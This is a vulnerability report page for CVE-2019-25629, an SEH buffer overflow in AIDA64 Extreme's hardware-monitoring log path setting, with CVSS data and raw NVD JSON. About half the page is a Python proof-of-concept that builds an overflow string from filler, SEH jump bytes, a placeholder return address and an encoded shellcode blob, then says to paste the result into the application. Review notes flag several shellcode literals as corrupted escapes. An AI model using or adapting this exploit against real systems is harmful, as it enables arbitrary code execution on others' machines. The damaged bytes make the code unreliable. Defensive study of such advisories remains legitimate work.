Security Vulnerability Report
CVE-2019-25629 CVSS 8.4 HIGH

CVE-2019-25629

Published: 2026-03-24 12:16:03
Last Modified: 2026-03-27 16:59:03

Description

AIDA64 Extreme 5.99.4900 contains a structured exception handler buffer overflow vulnerability in the logging functionality that allows local attackers to execute arbitrary code by supplying a malicious CSV log file path. Attackers can inject shellcode through the Hardware Monitoring logging preferences to overflow the buffer and trigger code execution when the application processes the log file path.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
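CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Note: the score and vector shown here match the CVSS 3.1 entry typed "Secondary" in the raw JSON below. The same record also carries a "Primary" CVSS 3.1 entry, CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (7.8 HIGH), which assumes low privileges are required, and a CVSS 4.0 base score of 8.6 (HIGH).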

Configurations (Affected Products)

cpe:2.3:a:aida64:aida64:5.99.4900:*:*:*:extreme:*:*:* - VULNERABLE
AIDA64 Extreme 5.99.4900

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys  # NOTE(review): not referenced anywhere in this listing
import struct

# Proof of Concept generator for CVE-2019-25629
# This script generates a malicious string to trigger SEH overflow
#
# NOTE(review): as printed on this page the listing is illustrative only.
# The author marks the address value below as a placeholder, and several of
# the later byte-string literals contain "\\x.." (an escaped backslash followed
# by plain text) where every other escape is "\x..". Those spots look like
# extraction damage, so the blob is probably not a faithful copy of the
# original; confirm against the referenced advisory before building detection
# content from these bytes.
#
# Defender view: the only affected build the page lists is AIDA64 Extreme
# 5.99.4900, and the input is the CSV log file path set in the Hardware
# Monitoring logging preferences. The value built here starts with 4061 filler
# bytes, well beyond the 260-character MAX_PATH most Windows applications work
# within, so an oversized log-path setting is a usable anomaly signal. Host
# mitigations aimed at SEH overwrites (SafeSEH, SEHOP) together with DEP/ASLR
# raise the bar; whether the affected modules opt into them is not shown here.
# The page names no fixed version; check the vendor for a current release.


def generate_payload() -> bytes:
    """Build the oversized path value used by this PoC and return it as bytes.

    The result is the concatenation, in order, of ``offset`` filler bytes, two
    packed little-endian 32-bit values, and the ``shellcode`` byte string.
    """
    # Offset to SEH handler (based on vulnerability analysis)
    # NOTE(review): the number is taken on trust from the page; nothing in
    # this listing derives or checks it.
    offset = 4061

    # SEH overwrite sequence
    # 0xEB 0x06 0x90 0x90 = JMP SHORT +6 + NOP + NOP
    # '<L' packs little-endian, so 0x909006EB is emitted as EB 06 90 90.
    # NOTE(review): despite its name this variable holds the four jump/NOP
    # bytes, not an address; the address-like value is `seh_address` below.
    seh_handler = struct.pack('<L', 0x909006EB)

    # POP POP RET address (universal or specific to AIDA64 module)
    # Placeholder address, needs to be replaced with valid address from vulnerable module
    # NOTE(review): 0x1001FFFF is the author's stand-in; the page supplies no
    # address taken from a real module.
    seh_address = struct.pack('<L', 0x1001FFFF)

    # Example Shellcode (calc.exe)
    # NOTE(review): opaque bytes reproduced exactly as printed. The "calc.exe"
    # label is the author's claim and is not verified here.
    shellcode = b"\xdb\xc0\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x43"
    shellcode += b"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
    shellcode += b"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
    shellcode += b"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
    shellcode += b"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4d\x43\x50\x55\x50"
    shellcode += b"\x43\x30\x43\x30\x4c\x4b\x57\x30\x56\x50\x4c\x4b\x55\x30\x54"
    shellcode += b"\x4c\x4c\x4b\x51\x50\x56\x50\x4c\x4b\x51\x55\x47\x4c\x4c\x4b\x50"
    shellcode += b"\x54\x54\x34\x4c\x4b\x55\x55\x57\x58\x56\x51\x4a\x4f\x4c\x4b\x56"
    shellcode += b"\x52\x4a\x4b\x4c\x46\x51\x4d\x4c\x4b\x57\x30\x56\x30\x4e\x4b\x51"
    shellcode += b"\x50\x54\x4c\x4c\x4b\x51\x50\x54\x4c\x4c\x4b\x51\x50\x45\x4c\x4e"
    shellcode += b"\x4b\x51\x4d\x56\x56\x50\x48\x4e\x56\x4e\x56\x4e\x36\x4b\x4f\x50"
    shellcode += b"\x51\x4c\x36\x4f\x30\x49\x4c\x4e\x4c\x31\x5a\x56\x58\x4d\x4c\x42"
    shellcode += b"\x55\x4a\x56\x56\x51\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x57\x4c\x43"
    shellcode += b"\x51\x52\x56\x4c\x31\x50\x56\x51\x4b\x4f\x4e\x4c\x4f\x34\x4b\x4f"
    shellcode += b"\x55\x4f\x56\x59\x50\x55\x4e\x34\x54\x56\x44\x43\x4b\x51\x4b\x4f"
    shellcode += b"\x4e\x50\x4c\x4e\x42\x4c\x51\x30\x53\x4c\x4b\x51\x57\x50\x53\x4b"
    shellcode += b"\x4f\x4e\x4c\x42\x51\x50\x4c\x53\x54\x4e\x52\x45\x58\x55\x35\x51"
    shellcode += b"\x4d\x4d\x4d\x4b\x4f\x48\x55\x47\x4c\x45\x56\x43\x4c\x44\x4a\x4d"
    shellcode += b"\x50\x49\x48\x4c\x47\x4f\x4b\x4f\x4e\x35\x4f\x4b\x4a\x50\x48\x35"
    shellcode += b"\x49\x32\x51\x56\x53\x58\x4e\x53\x45\x42\x33\x58\x4e\x36\x45\x32"
    shellcode += b"\x45\x51\x33\x58\x4e\x44\x44\x55\x49\x52\x4e\x32\x43\x4b\x4f\x48"
    shellcode += b"\x55\x45\x31\x4b\x4f\x4e\x35\x43\x58\x45\x30\x45\x50\x56\x30\x56"
    shellcode += b"\x30\x52\x48\x54\x31\x4c\x4b\x52\x4f\x4f\x47\x4b\x4f\x48\x55\x4f"
    shellcode += b"\x4f\x4f\x4f\x4e\x69\x52\x36\x50\x56\x50\x56\x50\x43\x42\x47\x52"
    shellcode += b"\x57\x45\x38\x43\x54\x42\x43\x51\x43\x4b\x4f\x4e\x35\x45\x38\x43"
    shellcode += b"\x53\x42\x52\x42\x55\x51\x30\x51\x55\x51\x55\x43\x53\x47\x4c\x4e"
    shellcode += b"\x49\x4d\x50\x4e\x50\x42\x54\x50\x55\x42\x4e\x51\x4d\x51\x4c\x45"
    shellcode += b"\x52\x56\x57\x50\x56\x51\x4c\x44\x42\x44\x51\x4b\x4f\x48\x55\x46"
    shellcode += b"\x58\x4c\x4b\x51\x4f\x51\x30\x46\x30\x56\x30\x56\x30\x42\x48\x4a"
    shellcode += b"\x52\x54\x4e\x43\x59\x42\x54\x46\x51\x4b\x4f\x4e\x35\x46\x52\x4b"
    shellcode += b"\x4f\x50\x52\x50\x50\x50\x50\x50\x42\x4e\x42\x58\x42\x4e\x42\x54"
    shellcode += b"\x42\x4e\x42\x4e\x51\x43\x42\x4e\x42\x4e\x42\x4e\x42\x4e\x42\x4e"
    shellcode += b"\x42\x4e\x42\x4e\x42\x4e\x42\x4e\x42\x4e\x42\x4e\x42\x4e\x4b\x58"
    shellcode += b"\x43\x42\x51\x43\x42\x4e\x42\x4e\x4d\x59\x4b\x55\x42\x54\x4b\x4f"
    shellcode += b"\x48\x55\x47\x54\x43\x57\x42\x4e\x42\x48\x43\x57\x44\x4e\x42\x55"
    shellcode += b"\x4b\x4f\x48\x55\x45\x38\x51\x4b\x50\x54\x51\x44\x45\x38\x43\x55"
    # NOTE(review): from here on several literals contain "\\x.." sequences,
    # which Python reads as a literal backslash followed by text rather than a
    # single byte. Left exactly as printed.
    shellcode += b"\x4b\x4f\x48\x55\x45\x52\x42\\x45\x4b\x4f\x4e\x35\x50\\x4b\x4f"
    shellcode += b"\x48\x55\x47\x30\x51\\x4b\x4f\x4e\x35\x45\x38\x45\x58\x45\x58"
    shellcode += b"\x56\x4c\x56\x50\x4b\x4f\x48\x55\x4c\x4b\x51\x4f\x50\\x4b\x4f"
    shellcode += b"\x4e\x35\x4f\x4b\x4a\x50\x48\x35\x49\x48\x4b\x4f\x4e\x35\x4f\x4b"
    shellcode += b"\x50\x57\x4b\x4f\x4e\x35\\x43\x58\x43\\x43\x4e\x4e\x50\x4b\x4f"
    shellcode += b"\x48\x55\\x45\x38\x4a\x30\x45\x51\x4b\x4f\x4e\x35\x4f\x4b\x50\x57"
    shellcode += b"\x4b\x4f\x48\x55\\x43\x54\x45\\x43\x4e\x4e\x50\\x4b\x4f\x48\x55"
    shellcode += b"\x45\\x43\x45\\x43\x4e\x4e\x50\\x4b\x4f\x48\x55\x45\\x43\x45\\x43"
    shellcode += b"\x4e\x4e\x50\\x4b\x4f\x48\x55\x45\\x43\x45\\x43\x4e\x4e\x50\\x4b"
    shellcode += b"\x4f\x48\x55\x45\\x43\x45\\x43\x4e\x4e\x50\\x4b\x4f\x48\x55"

    # Padding
    # Layout: filler up to `offset`, then the two packed dwords, then the blob.
    payload = b"A" * offset + seh_handler + seh_address + shellcode
    return payload


if __name__ == "__main__":
    # Generate the malicious path string
    evil_path = generate_payload()
    # Only the length is printed; this script never writes out or displays
    # the bytes themselves.
    print(f"Generated Malicious Path Length: {len(evil_path)}")
    print("Use this path in the AIDA64 Hardware Monitoring Logging Preferences.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25629", "sourceIdentifier": "[email protected]", "published": "2026-03-24T12:16:02.997", "lastModified": "2026-03-27T16:59:03.243", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AIDA64 Extreme 5.99.4900 contains a structured exception handler buffer overflow vulnerability in the logging functionality that allows local attackers to execute arbitrary code by supplying a malicious CSV log file path. Attackers can inject shellcode through the Hardware Monitoring logging preferences to overflow the buffer and trigger code execution when the application processes the log file path."}, {"lang": "es", "value": "AIDA64 Extreme 5.99.4900 contiene una vulnerabilidad de desbordamiento de búfer en el gestor de excepciones estructuradas en la funcionalidad de registro que permite a atacantes locales ejecutar código arbitrario al proporcionar una ruta de archivo de registro CSV maliciosa. Los atacantes pueden inyectar shellcode a través de las preferencias de registro de Monitorización de Hardware para desbordar el búfer y desencadenar la ejecución de código cuando la aplicación procesa la ruta del archivo de registro."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", 
"availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aida64:aida64:5.99.4900:*:*:*:extreme:*:*:*", "matchCriteriaId": 
"59100A69-BA3C-4B96-B6E5-168C39A2161B"}]}]}], "references": [{"url": "http://download.aida64.com/aida64extreme599.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.aida64.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46660", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/aida64-extreme-seh-buffer-overflow-via-logging", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}